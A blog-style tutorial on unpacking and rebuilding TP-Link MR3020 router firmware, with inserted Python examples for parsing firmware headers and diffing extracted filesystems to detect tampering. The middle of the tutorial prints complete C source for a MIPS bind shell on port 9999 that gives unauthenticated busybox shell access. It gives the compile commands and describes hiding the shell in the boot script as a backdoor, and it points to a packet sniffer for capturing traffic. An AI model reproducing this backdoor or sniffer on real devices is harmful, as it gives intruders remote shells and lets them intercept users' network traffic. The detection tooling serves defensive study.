How to Turn Your Switch into a Snitch

Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.

This post is all about modifying your existing router firmware to perform cool things.

Hardware and Tools Needed:

For the router I am using a TP-Link MR3020. You may use whatever router you like, but make sure you won’t brick your device while or after uploading the modified firmware. Also make sure your firmware can be unpacked and rebuilt using the FMK (Firmware Mod Kit).

Download Firmware Mod Kit

If you examine your firmware using Binwalk you will get lots of useful information such as headers, sections, the compression used, etc.

$ binwalk -t -vv ~/mr3020nv1_en_3_17_2_up_boot\(140610\).bin 

Scan Time:     2015-10-12 07:06:11
Target File:   /root/mr3020nv1_en_3_17_2_up_boot(140610).bin
MD5 Checksum:  4e44ca7cdabf7286228b8b4324e3d51a
Signatures:    285

DECIMAL       HEXADECIMAL     DESCRIPTION
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0             0x0             TP-Link firmware header, firmware version: 3.17.2, image version: "ver. 1.0", product ID: 0x30200001, product version: 1, kernel load address: 0x80002000, kernel entry point:
                              0x801D58B0, kernel offset: 512, kernel length: 892221, rootfs offset: 1048576, rootfs length: 2883584, bootloader offset: 0, bootloader length: 48393
14144         0x3740          U-Boot version string, "U-Boot 1.1.4-ge28c8345 (Jun 10 2014 - 17:57:47)"
15488         0x3C80          uImage header, header size: 64 bytes, header CRC: 0xC21F81, created: Tue Jun 10 05:57:48 2014, image size: 33353 bytes, Data Address: 0x80010000, Entry Point: 0x80010000, data CRC:
                              0x2DF367A0, OS: Linux, CPU: MIPS, image type: Firmware Image, compression type: lzma, image name: "u-boot image"
15552         0x3CC0          LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 95584 bytes
131584        0x20200         TP-Link firmware header, firmware version: 3.17.2, image version: "ver. 1.0", product ID: 0x30200001, product version: 1, kernel load address: 0x80002000, kernel entry point:
                              0x801D58B0, kernel offset: 512, kernel length: 892221, rootfs offset: 1048576, rootfs length: 2883584, bootloader offset: 0, bootloader length: 0
132096        0x20400         LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2581428 bytes
1180160       0x120200        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2594041 bytes,  624 inodes, blocksize: 131072 bytes, created: Tue Jun 10 06:04:31 2014
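The two "TP-Link firmware header" lines above are what tell the unpacker (and you) where the kernel and rootfs live. The following Python parser, added here as an example and not part of the original post or the FMK, reads that 512-byte header and cross-checks its offsets before anything is extracted or reflashed. The field layout is the one used by OpenWrt's mktplinkfw tool and is assumed here; the sample header it builds is constructed from the values binwalk printed for the MR3020 image (md5 fields zeroed, vendor string and header version assumed), so it is not a real image.

```python
"""Parse and sanity-check a TP-Link firmware header (added example)."""
import struct

HEADER_LEN = 512
# Big-endian layout assumed from OpenWrt's mktplinkfw: header version, vendor name,
# image version string, hw id, hw rev, unknown, md5 #1, unknown, md5 #2, unknown,
# nine 32-bit layout words, three 16-bit firmware version parts, padding.
_FMT = ">I24s36s3I16sI16sI9I3H354s"
assert struct.calcsize(_FMT) == HEADER_LEN


def parse_header(data, offset=0):
    """Return the header fields found at `offset` in `data` as a dict."""
    if len(data) < offset + HEADER_LEN:
        raise ValueError("image too short for a header at 0x%x" % offset)
    f = struct.unpack_from(_FMT, data, offset)
    return {
        "header_version": f[0],
        "vendor": f[1].rstrip(b"\0").decode("ascii", "replace"),
        "image_version": f[2].rstrip(b"\0").decode("ascii", "replace"),
        "product_id": f[3],
        "product_version": f[4],
        "md5_1": f[6],
        "md5_2": f[8],
        "kernel_load_address": f[10],
        "kernel_entry_point": f[11],
        "firmware_length": f[12],
        "kernel_offset": f[13],
        "kernel_length": f[14],
        "rootfs_offset": f[15],
        "rootfs_length": f[16],
        "bootloader_offset": f[17],
        "bootloader_length": f[18],
        "firmware_version": "%d.%d.%d" % (f[19], f[20], f[21]),
    }


def check_layout(hdr, image_len):
    """Return a list of consistency problems; an empty list means the header is sane.
    image_len is the number of bytes from the header start to the end of the image."""
    problems = []
    for name in ("kernel", "rootfs"):
        start, length = hdr[name + "_offset"], hdr[name + "_length"]
        if length == 0:
            problems.append("%s length is zero" % name)
        elif start + length > image_len:
            problems.append("%s region 0x%x+0x%x runs past end of image (0x%x)"
                            % (name, start, length, image_len))
    if hdr["kernel_offset"] < HEADER_LEN:
        problems.append("kernel offset overlaps the header")
    if hdr["rootfs_offset"] < hdr["kernel_offset"] + hdr["kernel_length"]:
        problems.append("rootfs region overlaps kernel region")
    # kernel_length is the compressed size, so only the lower bound can be checked
    if hdr["kernel_entry_point"] < hdr["kernel_load_address"]:
        problems.append("kernel entry point lies below the load address")
    return problems


def find_headers(data, product_id):
    """Scan 512-byte-aligned offsets for headers with the expected product id
    whose layout checks pass (binwalk found one at 0 and one at 0x20200)."""
    found = []
    for off in range(0, len(data) - HEADER_LEN + 1, HEADER_LEN):
        hdr = parse_header(data, off)
        if hdr["product_id"] == product_id and not check_layout(hdr, len(data) - off):
            found.append((off, hdr))
    return found


def build_sample_header():
    """Constructed header using the field values binwalk printed for the MR3020
    image; header version, vendor string and firmware length are assumptions."""
    return struct.pack(
        _FMT,
        0x01000000, b"TP-LINK Technologies", b"ver. 1.0",
        0x30200001, 1, 0, b"\0" * 16, 0, b"\0" * 16, 0,
        0x80002000, 0x801D58B0, 3932160,
        512, 892221, 1048576, 2883584, 0, 48393,
        3, 17, 2, b"\0" * 354)


def build_sample_image():
    """Constructed image: the sample header followed by zero padding up to rootfs end."""
    return build_sample_header() + b"\0" * (3932160 - HEADER_LEN)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    for off, hdr in find_headers(data, 0x30200001):
        print("header at 0x%x: fw %s, image %r, kernel @0x%x len %d, rootfs @0x%x len %d"
              % (off, hdr["firmware_version"], hdr["image_version"],
                 hdr["kernel_offset"], hdr["kernel_length"],
                 hdr["rootfs_offset"], hdr["rootfs_length"]))
```

Run it against the real .bin to list every header whose regions fit inside the file; a header whose kernel or rootfs region runs past the end of the image, or whose product ID is not 0x30200001 for this model, is a sign the image is not what the bootloader expects and should not be flashed.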

After installing the FMK I will extract my firmware for the MR3020.

$ ./extract-firmware.sh mr3020nv1_en_3_17_2_up_boot\(140610\).bin

Next you will see your extracted firmware inside the fmk directory. You can explore the file system of your router like this.

$ ls
image_parts  logs  rootfs
$ cd rootfs/
$ ls
bin  dev  etc  lib  linuxrc  mnt  proc  root  sbin  tmp  usr  var  web

Inside the “web” directory you can find the source of the router’s web interface, which is served on port 80. This is an example where I’ve modified the banner of the “top.htm” page.

After your modifications are done use this bash script inside the fmk directory and build the firmware.

$ ./build-firmware.sh

My router uses BusyBox. BusyBox is a single executable that provides several stripped-down Unix tools; the commands in /bin are symlinks to it.

$ ls -la
drwxr-xr-x  2 root root   4096 Jun 10  2014 .
drwxrwxr-x 14 root root   4096 Jun 10  2014 ..
-rwxr-xr-x  1 root root 267408 Jun 10  2014 busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 cat -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 chmod -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 date -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 df -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 echo -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 false -> busybox
lrwxrwxrwx  1 root root     83 Oct 12 04:02 iptables-xml -> /data/jenkins/workspace/MR3020-REL/build/../rootfs.build.2.6.31/sbin/iptables-multi
lrwxrwxrwx  1 root root      7 Oct 12 04:02 kill -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 login -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 ls -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 mount -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 msh -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 ping -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 ps -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 rm -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 sh -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 true -> busybox
lrwxrwxrwx  1 root root      7 Oct 12 04:02 umount -> busybox

We can first write a simple bind shell and test if it works. For that I have written a simple bind shell in C using fork() so that it can handle multiple clients and the router won’t need to be restarted each time the socket closes 🙂

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>       /* fork, dup2, execve, write, close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SERVER_PORT 9999
/* CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
 * Bind Shell using Fork for my TP-Link mr3020 router running busybox
 * Arch : MIPS
 * mips-linux-gnu-gcc mybindshell.c -o mybindshell -static -EB -march=24kc
 */
int main() {
	int serverfd, clientfd, server_pid, i;
	char *banner = "[~] Welcome to @OsandaMalith's Bind Shell\n";
	char *args[] = { "/bin/busybox", "sh", (char *) 0 };
	struct sockaddr_in server, client;
	socklen_t len;

	server.sin_family = AF_INET;
	server.sin_port = htons(SERVER_PORT);
	server.sin_addr.s_addr = INADDR_ANY;

	serverfd = socket(AF_INET, SOCK_STREAM, 0);
	bind(serverfd, (struct sockaddr *)&server, sizeof(server));
	listen(serverfd, 1);

	while (1) {
		len = sizeof(client);
		clientfd = accept(serverfd, (struct sockaddr *)&client, &len);
		server_pid = fork();
		if (server_pid == 0) {
			/* child: point stdin/stdout/stderr at the socket and run busybox sh */
			write(clientfd, banner, strlen(banner));
			for (i = 0; i < 3; i++) dup2(clientfd, i);
			execve("/bin/busybox", args, (char *) 0);
			close(clientfd);   /* only reached if execve failed */
			exit(1);
		}
		/* parent: drop its copy of the client socket and go back to accept() */
		close(clientfd);
	}
	return 0;
}

https://github.com/OsandaMalith/TP-Link/blob/master/bindshell.c

Compile using the GCC cross compiler for the MIPS architecture.

$ mips-linux-gnu-gcc -o mybindshell mybindshell.c -static -EB -march=24kc

We give the -static option so that all needed libraries are linked into the binary. This is because the router uses BusyBox and some shared libraries may not be present on it. The -march=24kc flag matches the router’s CPU model.

Since the size is huge I’ll strip the debugging symbols, etc.

$ mips-linux-gnu-strip -s mybindshell

After that we can place this shell inside the “bin” directory and change the startup script so that it runs our shell after booting. The “rcS” file can be found inside the “/etc/rc.d” folder. This script runs once everything is in a ready state, which is why it is the place to start our backdoor.

As you can see, I have set the shell to run in the background after the httpd daemon is started.

Next build the firmware and update your new firmware 🙂

If I do a very basic nmap scan, you can see that port 9999 is listening.

Here you go, my simple bind shell 🙂
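Seen from the other side, the two changes made above (a new binary in bin and an extra line in /etc/rc.d/rcS) are exactly what an integrity check of an unpacked image should catch. The following Python script is an added example, not code from the post or the FMK: it hashes two extracted rootfs trees (vendor image versus the image under review), reports added, removed and modified files, and flags new entries under the binary directories and any changed startup script. The startup-script paths, the sample digests and the sample rcS text are constructed for illustration; /usr/bin/httpd is a stand-in, not a path taken from the MR3020.

```python
"""Diff two extracted rootfs trees and flag firmware modifications (added example)."""
import hashlib
import os

# Startup scripts worth watching; etc/rc.d/rcS is the one on this router,
# etc/init.d/rcS is a common alternative location (assumption).
STARTUP_SCRIPTS = ("etc/rc.d/rcS", "etc/init.d/rcS")
BIN_DIRS = ("bin/", "sbin/", "usr/bin/", "usr/sbin/")


def tree_digests(root):
    """Map relative path -> sha256 of every regular file under root;
    symlinks are recorded by their target so a retargeted link shows up too."""
    out = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if os.path.islink(full):
                out[rel] = "link:" + os.readlink(full)
            else:
                with open(full, "rb") as fh:
                    out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out


def diff_trees(known_good, suspect):
    """Both arguments are dicts as returned by tree_digests()."""
    added = sorted(set(suspect) - set(known_good))
    removed = sorted(set(known_good) - set(suspect))
    modified = sorted(p for p in known_good.keys() & suspect.keys()
                      if known_good[p] != suspect[p])
    return {"added": added, "removed": removed, "modified": modified}


def flag_findings(diff):
    """Highlight the changes that matter most: new binaries and edited startup scripts."""
    findings = []
    for p in diff["added"]:
        if p.startswith(BIN_DIRS):
            findings.append("new binary: " + p)
    for p in diff["modified"]:
        if p in STARTUP_SCRIPTS:
            findings.append("startup script changed: " + p)
    return findings


def new_startup_lines(good_script, suspect_script):
    """Lines in the suspect startup script that the known-good one does not have
    (blank lines and comments ignored)."""
    def lines(text):
        return [l.strip() for l in text.splitlines()
                if l.strip() and not l.strip().startswith("#")]
    good = set(lines(good_script))
    return [l for l in lines(suspect_script) if l not in good]


# Constructed sample data: a stand-in rcS and two fake digest tables.
SAMPLE_RCS_GOOD = """#!/bin/sh
# constructed stand-in for /etc/rc.d/rcS, not the real MR3020 script
mount -t proc proc /proc
/usr/bin/httpd &
"""
SAMPLE_RCS_SUSPECT = SAMPLE_RCS_GOOD + "/bin/mybindshell &\n"

SAMPLE_GOOD = {
    "bin/busybox": "constructed-digest-of-vendor-busybox",
    "bin/sh": "link:busybox",
    "etc/rc.d/rcS": hashlib.sha256(SAMPLE_RCS_GOOD.encode()).hexdigest(),
    "web/top.htm": "constructed-digest-of-vendor-top",
}
SAMPLE_SUSPECT = dict(SAMPLE_GOOD)
SAMPLE_SUSPECT["bin/mybindshell"] = "constructed-digest-of-unknown-binary"
SAMPLE_SUSPECT["etc/rc.d/rcS"] = hashlib.sha256(SAMPLE_RCS_SUSPECT.encode()).hexdigest()


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:   # usage: script.py <vendor rootfs dir> <suspect rootfs dir>
        good, suspect = tree_digests(sys.argv[1]), tree_digests(sys.argv[2])
    else:
        good, suspect = SAMPLE_GOOD, SAMPLE_SUSPECT
    result = diff_trees(good, suspect)
    for key in ("added", "removed", "modified"):
        for p in result[key]:
            print("%-9s %s" % (key, p))
    for finding in flag_findings(result):
        print("FLAG:", finding)
```

Pointing it at the fmk/rootfs directories of the vendor image and of a firmware dump taken from a deployed router gives a quick answer to "was this image modified", without needing the rcS diff by eye; the web directory changes from earlier in the post would appear under modified in the same run.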

You can add a password so that not everyone can access it.

What else can we do? Lots of cool things, but remember we have limited space for everything. Here’s a simple sniffer written by Vivek: https://github.com/OsandaMalith/TP-Link/blob/master/sniffer.c

Compile it, strip it, build the firmware and upload it to your device. Put your interface in promiscuous mode and pass the interface name and the packet count; I use br0, which holds the default gateway. Here’s a sample output.

Likewise, you can do lots of cool things with your router. Also check out OpenWrt. After installing it on your router you can do a lot more than by modifying the existing firmware.

If you are interested in embedded hacking, have a look at this awesome series on PentesterAcademy: Make your own Hacker Gadget.
